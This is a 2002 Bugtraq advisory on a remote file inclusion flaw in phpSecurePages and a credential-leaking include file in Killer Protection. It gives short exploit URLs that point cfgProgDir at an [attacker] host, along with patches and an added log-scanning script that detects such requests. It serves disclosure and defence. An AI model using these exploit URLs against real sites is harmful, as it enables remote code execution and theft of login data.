[27322] in bugtraq

phpSecurePages & Killer Protection ( PHP )

daemon@ATHENA.MIT.EDU (Frog Man)
Mon Oct 7 13:59:55 2002

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 06 Oct 2002 21:47:02 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F8415BopaZknqWuspGw00016117@hotmail.com>

1)
Information :
°°°°°°°°°°°°°
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file

PHP Code :
°°°°°°°°°°
-------------- checklogin.php ---------------------
if (!$login) {
	// no login available
	include($cfgProgDir . "interface.php");
	exit;
}
if (!$password) {
	// no password available
	$message = $strNoPassword;
	include($cfgProgDir . "interface.php");
	exit;
}
-------------- checklogin.php ------------------

Exploit :
°°°°°°°°°
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php .

Patch :
°°°°°°°
Add this :
$cfgProgDir =  './';
at the beginning of checklogin.php .

More details in French :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




2)
Information :
°°°°°°°°°°°°°
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Information disclosure

Exploit :
°°°°°°°°°
http://[target]/vars.inc
and
http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD]

Patch :
°°°°°°°
Rename vars.inc >> vars.inc.php .
In protection.php, replace
require("vars2.inc");
by
require("vars2.inc.php");


More details in French :
http://www.frog-man.org/tutos/KillerProtection.txt

translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n
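
A defender's view of both issues, as an added example that is not part of the original post: a log check that flags requests whose query parameter carries a remote URL (the cfgProgDir pattern in item 1) and direct requests for .inc files (the vars.inc pattern in item 2). The log lines, addresses, host names and function names are constructed for illustration, and a Common Log Format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
INCLUDE_EXTENSIONS = ('.inc',)  # assumption: served as plain text by the web server


def classify(line):
    """Return a list of (finding, detail) tuples for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    findings = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value.strip()):
            findings.append(('remote-url-parameter', name))
    if target.path.lower().endswith(INCLUDE_EXTENSIONS):
        findings.append(('include-file-request', target.path))
    return findings


def scan(lines):
    """Map 1-based line number to its findings, omitting clean lines."""
    report = {}
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            report[number] = findings
    return report


# Constructed sample lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2002:14:01:12 +0200] "GET /checklogin.php?cfgProgDir=http://files.example/ HTTP/1.0" 200 512',
    '192.0.2.10 - - [07/Oct/2002:14:01:15 +0200] "GET /checklogin.php?cfgProgDir=http%3A%2F%2Ffiles.example%2F&login=1 HTTP/1.0" 200 512',
    '192.0.2.44 - - [07/Oct/2002:14:02:40 +0200] "GET /vars.inc HTTP/1.0" 200 231',
    '192.0.2.77 - - [07/Oct/2002:14:03:05 +0200] "GET /index.php?page=news&id=4 HTTP/1.0" 200 4096',
]

if __name__ == '__main__':
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, findings)
```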

